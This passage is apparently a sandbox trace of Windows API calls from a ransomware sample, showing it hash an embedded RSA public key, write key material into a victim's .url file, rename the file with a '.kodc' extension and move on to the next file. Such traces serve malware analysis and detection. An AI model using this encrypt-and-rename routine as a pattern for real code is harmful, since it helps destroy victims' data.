KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.434] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0101.435] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.435] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.435] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.435] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.435] GetLastError () returned 0x0 [0101.435] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.435] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0101.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.435] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.435] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.435] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.436] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5e90 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f80 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ed8 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f98 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fc8 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fe0 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.436] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fc8 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fe0 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7fe0 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7fc8 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fe0 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fc8 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.438] GetCurrentThreadId () returned 0x42c [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7e88 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.438] GetCurrentThreadId () returned 0x42c [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fc8 [0101.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fe0 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fb0 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ff8 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fc8 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fc8 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fc8 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ff8 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fe0 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fb0 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f98 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5ed8 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.442] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x80, lpOverlapped=0x0) returned 1 [0101.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.443] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.443] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.443] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.444] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.444] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.444] CloseHandle (hObject=0x5cc) returned 1 [0101.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3336ce0 [0101.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x33515f0 [0101.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3336ce0 | out: hHeap=0x630000) returned 1 [0101.445] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.kodc")) returned 1 [0101.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0101.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.446] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0101.447] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0101.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.448] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0101.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.448] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.448] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, 